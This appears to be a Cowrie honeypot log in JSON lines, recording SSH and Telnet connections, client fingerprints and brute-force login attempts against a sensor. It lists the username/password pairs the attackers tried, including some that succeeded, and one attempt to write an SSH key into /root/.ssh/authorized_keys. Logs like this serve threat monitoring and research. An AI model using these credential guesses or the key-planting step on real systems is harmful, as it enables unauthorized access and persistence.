{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T01:21:20.997717Z","src_ip":"27.112.78.170","session":"067fa5091019"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:21:20.998703Z","src_ip":"27.112.78.170","session":"067fa5091019"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":36902,"dst_ip":"1.2.3.4","dst_port":22,"session":"684e18d27a80","protocol":"ssh","message":"New connection: 27.112.78.170:36902 (1.2.3.4:22) [session: 684e18d27a80]","sensor":"my-vps","timestamp":"2025-08-26T01:21:21.269882Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:21:21.270835Z","src_ip":"27.112.78.170","session":"684e18d27a80"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:21:21.535273Z","src_ip":"27.112.78.170","session":"684e18d27a80"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T01:21:22.638476Z","src_ip":"27.112.78.170","session":"684e18d27a80"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:21:23.906054Z","src_ip":"27.112.78.170","session":"684e18d27a80"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":36906,"dst_ip":"1.2.3.4","dst_port":22,"session":"bf4026fc14c8","protocol":"ssh","message":"New connection: 27.112.78.170:36906 (1.2.3.4:22) [session: bf4026fc14c8]","sensor":"my-vps","timestamp":"2025-08-26T01:21:24.176517Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:21:24.177432Z","src_ip":"27.112.78.170","session":"bf4026fc14c8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:21:24.449564Z","src_ip":"27.112.78.170","session":"bf4026fc14c8"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:21:25.579099Z","src_ip":"27.112.78.170","session":"bf4026fc14c8"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:21:25.852869Z","src_ip":"27.112.78.170","session":"bf4026fc14c8"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:21:25.853781Z","src_ip":"27.112.78.170","session":"067fa5091019"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":38396,"dst_ip":"1.2.3.4","dst_port":23,"session":"33ccd3f66fc8","protocol":"telnet","message":"New connection: 218.1.218.143:38396 (1.2.3.4:23) [session: 33ccd3f66fc8]","sensor":"my-vps","timestamp":"2025-08-26T01:21:29.800394Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":38400,"dst_ip":"1.2.3.4","dst_port":23,"session":"04d394d78e28","protocol":"telnet","message":"New connection: 218.1.218.143:38400 (1.2.3.4:23) [session: 04d394d78e28]","sensor":"my-vps","timestamp":"2025-08-26T01:21:30.529043Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":38404,"dst_ip":"1.2.3.4","dst_port":23,"session":"baa8ec8fd83f","protocol":"telnet","message":"New connection: 218.1.218.143:38404 (1.2.3.4:23) [session: baa8ec8fd83f]","sensor":"my-vps","timestamp":"2025-08-26T01:21:31.491629Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":38415,"dst_ip":"1.2.3.4","dst_port":23,"session":"d1821a7f4319","protocol":"telnet","message":"New connection: 218.1.218.143:38415 (1.2.3.4:23) [session: d1821a7f4319]","sensor":"my-vps","timestamp":"2025-08-26T01:21:33.508731Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":38437,"dst_ip":"1.2.3.4","dst_port":23,"session":"ab9e4535bc34","protocol":"telnet","message":"New connection: 218.1.218.143:38437 (1.2.3.4:23) [session: ab9e4535bc34]","sensor":"my-vps","timestamp":"2025-08-26T01:21:37.685294Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.1.218.143","src_port":38481,"dst_ip":"1.2.3.4","dst_port":23,"session":"2ab90ab2890c","protocol":"telnet","message":"New connection: 218.1.218.143:38481 (1.2.3.4:23) [session: 2ab90ab2890c]","sensor":"my-vps","timestamp":"2025-08-26T01:21:46.288895Z"}
{"eventid":"cowrie.session.closed","duration":41.71631717681885,"message":"Connection lost after 41 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:22:13.207881Z","src_ip":"218.1.218.143","session":"baa8ec8fd83f"}
{"eventid":"cowrie.session.closed","duration":44.065927505493164,"message":"Connection lost after 44 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:22:14.594904Z","src_ip":"218.1.218.143","session":"04d394d78e28"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":35164,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf2a6ae452fc","protocol":"ssh","message":"New connection: 139.19.117.131:35164 (1.2.3.4:22) [session: cf2a6ae452fc]","sensor":"my-vps","timestamp":"2025-08-26T01:22:24.036571Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:22:24.037256Z","src_ip":"139.19.117.131","session":"cf2a6ae452fc"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T01:22:24.175560Z","src_ip":"139.19.117.131","session":"cf2a6ae452fc"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ed:b8:6d:4a:26:21:7e:9e:98:21:39:01:a6:5b:58:32","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCjh43iWyYUMiBhhffdk7NnJYGIOLdUVVBgXg9tOY6CBGUhMVQEv9QFzeMeZUeWZ3uF9EqVbCCeU1HI8DKQ8Sxy9v9eWGohiCeH1VwoeuphkLk9y3pQZ0ipNlyN18MlIEP7tuxJI6TSESB5TiTOZ652fB6JSG9SDZVKy9FF6HrndBfG2SPaC8Eu0c4erbuBNPv+sWFttoJeHro9hYTGvd4ZrjUUAFiDQTtlnyd0SnKv56wSWqmI/bYZ0heAjhpU6YjSdag0nzWbS+Uz0Z5kYwWJUZ+1Je4xjj8SqoRkLKhFCV8KixsYrOBbqQBSy4EUFSehalxQZZJIY0y3v0aiEYsh","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ed:b8:6d:4a:26:21:7e:9e:98:21:39:01:a6:5b:58:32","sensor":"my-vps","timestamp":"2025-08-26T01:22:24.234178Z","src_ip":"139.19.117.131","session":"cf2a6ae452fc"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ed:b8:6d:4a:26:21:7e:9e:98:21:39:01:a6:5b:58:32","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCjh43iWyYUMiBhhffdk7NnJYGIOLdUVVBgXg9tOY6CBGUhMVQEv9QFzeMeZUeWZ3uF9EqVbCCeU1HI8DKQ8Sxy9v9eWGohiCeH1VwoeuphkLk9y3pQZ0ipNlyN18MlIEP7tuxJI6TSESB5TiTOZ652fB6JSG9SDZVKy9FF6HrndBfG2SPaC8Eu0c4erbuBNPv+sWFttoJeHro9hYTGvd4ZrjUUAFiDQTtlnyd0SnKv56wSWqmI/bYZ0heAjhpU6YjSdag0nzWbS+Uz0Z5kYwWJUZ+1Je4xjj8SqoRkLKhFCV8KixsYrOBbqQBSy4EUFSehalxQZZJIY0y3v0aiEYsh","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T01:22:24.235522Z","src_ip":"139.19.117.131","session":"cf2a6ae452fc"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"ed:b8:6d:4a:26:21:7e:9e:98:21:39:01:a6:5b:58:32","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCjh43iWyYUMiBhhffdk7NnJYGIOLdUVVBgXg9tOY6CBGUhMVQEv9QFzeMeZUeWZ3uF9EqVbCCeU1HI8DKQ8Sxy9v9eWGohiCeH1VwoeuphkLk9y3pQZ0ipNlyN18MlIEP7tuxJI6TSESB5TiTOZ652fB6JSG9SDZVKy9FF6HrndBfG2SPaC8Eu0c4erbuBNPv+sWFttoJeHro9hYTGvd4ZrjUUAFiDQTtlnyd0SnKv56wSWqmI/bYZ0heAjhpU6YjSdag0nzWbS+Uz0Z5kYwWJUZ+1Je4xjj8SqoRkLKhFCV8KixsYrOBbqQBSy4EUFSehalxQZZJIY0y3v0aiEYsh","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint ed:b8:6d:4a:26:21:7e:9e:98:21:39:01:a6:5b:58:32","sensor":"my-vps","timestamp":"2025-08-26T01:22:24.256495Z","src_ip":"139.19.117.131","session":"cf2a6ae452fc"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"ed:b8:6d:4a:26:21:7e:9e:98:21:39:01:a6:5b:58:32","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCjh43iWyYUMiBhhffdk7NnJYGIOLdUVVBgXg9tOY6CBGUhMVQEv9QFzeMeZUeWZ3uF9EqVbCCeU1HI8DKQ8Sxy9v9eWGohiCeH1VwoeuphkLk9y3pQZ0ipNlyN18MlIEP7tuxJI6TSESB5TiTOZ652fB6JSG9SDZVKy9FF6HrndBfG2SPaC8Eu0c4erbuBNPv+sWFttoJeHro9hYTGvd4ZrjUUAFiDQTtlnyd0SnKv56wSWqmI/bYZ0heAjhpU6YjSdag0nzWbS+Uz0Z5kYwWJUZ+1Je4xjj8SqoRkLKhFCV8KixsYrOBbqQBSy4EUFSehalxQZZJIY0y3v0aiEYsh","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T01:22:24.257200Z","src_ip":"139.19.117.131","session":"cf2a6ae452fc"}
{"eventid":"cowrie.session.closed","duration":62.50417232513428,"message":"Connection lost after 62 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:22:32.304470Z","src_ip":"218.1.218.143","session":"33ccd3f66fc8"}
{"eventid":"cowrie.session.closed","duration":46.11796951293945,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:22:32.406798Z","src_ip":"218.1.218.143","session":"2ab90ab2890c"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:22:34.036864Z","src_ip":"139.19.117.131","session":"cf2a6ae452fc"}
{"eventid":"cowrie.session.closed","duration":64.61915421485901,"message":"Connection lost after 64 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:22:38.127800Z","src_ip":"218.1.218.143","session":"d1821a7f4319"}
{"eventid":"cowrie.session.closed","duration":62.29491353034973,"message":"Connection lost after 62 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:22:39.980130Z","src_ip":"218.1.218.143","session":"ab9e4535bc34"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":45884,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8987f0f4549","protocol":"ssh","message":"New connection: 27.112.78.170:45884 (1.2.3.4:22) [session: c8987f0f4549]","sensor":"my-vps","timestamp":"2025-08-26T01:22:56.661719Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:22:56.662648Z","src_ip":"27.112.78.170","session":"c8987f0f4549"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T01:22:56.937248Z","src_ip":"27.112.78.170","session":"c8987f0f4549"}
{"eventid":"cowrie.login.failed","username":"root/bin","password":"123456","message":"login attempt [root/bin/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T01:22:58.071432Z","src_ip":"27.112.78.170","session":"c8987f0f4549"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:22:59.347015Z","src_ip":"27.112.78.170","session":"c8987f0f4549"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55660,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b8a7ee5cc6e","protocol":"ssh","message":"New connection: 217.72.205.35:55660 (1.2.3.4:22) [session: 5b8a7ee5cc6e]","sensor":"my-vps","timestamp":"2025-08-26T01:23:16.688817Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:23:16.690093Z","src_ip":"217.72.205.35","session":"5b8a7ee5cc6e"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":52681,"dst_ip":"1.2.3.4","dst_port":22,"session":"c42d60399798","protocol":"ssh","message":"New connection: 80.94.95.112:52681 (1.2.3.4:22) [session: c42d60399798]","sensor":"my-vps","timestamp":"2025-08-26T01:23:37.630922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T01:23:37.631942Z","src_ip":"80.94.95.112","session":"c42d60399798"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T01:23:37.662132Z","src_ip":"80.94.95.112","session":"c42d60399798"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vfkbyf","message":"login attempt [admin/vfkbyf] failed","sensor":"my-vps","timestamp":"2025-08-26T01:23:37.866544Z","src_ip":"80.94.95.112","session":"c42d60399798"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vasiliy","message":"login attempt [admin/vasiliy] failed","sensor":"my-vps","timestamp":"2025-08-26T01:23:38.902338Z","src_ip":"80.94.95.112","session":"c42d60399798"}
{"eventid":"cowrie.login.failed","username":"admin","password":"vangogh","message":"login attempt [admin/vangogh] failed","sensor":"my-vps","timestamp":"2025-08-26T01:23:39.935318Z","src_ip":"80.94.95.112","session":"c42d60399798"}
{"eventid":"cowrie.login.failed","username":"admin","password":"urlaub","message":"login attempt [admin/urlaub] failed","sensor":"my-vps","timestamp":"2025-08-26T01:23:40.967948Z","src_ip":"80.94.95.112","session":"c42d60399798"}
{"eventid":"cowrie.login.failed","username":"admin","password":"twostep","message":"login attempt [admin/twostep] failed","sensor":"my-vps","timestamp":"2025-08-26T01:23:42.001874Z","src_ip":"80.94.95.112","session":"c42d60399798"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:23:43.034981Z","src_ip":"80.94.95.112","session":"c42d60399798"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":51854,"dst_ip":"1.2.3.4","dst_port":22,"session":"9267ced271d7","protocol":"ssh","message":"New connection: 45.88.8.186:51854 (1.2.3.4:22) [session: 9267ced271d7]","sensor":"my-vps","timestamp":"2025-08-26T01:24:14.192679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T01:24:14.769532Z","src_ip":"45.88.8.186","session":"9267ced271d7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T01:24:14.770283Z","src_ip":"45.88.8.186","session":"9267ced271d7"}
{"eventid":"cowrie.login.success","username":"root","password":"mayank@12345","message":"login attempt [root/mayank@12345] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:24:17.603891Z","src_ip":"45.88.8.186","session":"9267ced271d7"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:24:18.346960Z","src_ip":"45.88.8.186","session":"9267ced271d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":19553,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca1a1e91a503","protocol":"telnet","message":"New connection: 212.227.235.229:19553 (1.2.3.4:23) [session: ca1a1e91a503]","sensor":"my-vps","timestamp":"2025-08-26T01:24:20.421388Z"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":60634,"dst_ip":"1.2.3.4","dst_port":22,"session":"2fcb04ee89d8","protocol":"ssh","message":"New connection: 27.112.78.170:60634 (1.2.3.4:22) [session: 2fcb04ee89d8]","sensor":"my-vps","timestamp":"2025-08-26T01:24:25.544863Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:24:25.545630Z","src_ip":"27.112.78.170","session":"2fcb04ee89d8"}
